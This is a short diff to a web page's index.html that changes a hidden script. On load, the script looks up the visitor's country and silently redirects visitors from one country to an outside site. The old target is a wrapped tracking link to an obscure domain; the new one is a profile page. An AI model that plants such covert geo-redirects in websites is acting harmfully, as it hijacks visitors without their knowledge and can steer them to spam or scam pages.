--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
     fetch('https://ipapi.co/json/')
         .then(r => r.json())
         .then(data => {
-            if (data.country_code === 'CM') window.location.href = 'https://www.google.com/url?q=https%3A%2F%2Ffalloutsemicolon.com%2Fixe84x4zr%3Fkey%3D4d6b9409bf5780a68265a294aab610cd&sa=D&sntz=1&usg=AOvVaw25SwexEpGcpQ6COTk-W16H';
+            if (data.country_code === 'TZ') window.location.href = 'https://beacons.ai/jojokamdoli';
         })
         .catch(() => {});
     </script>
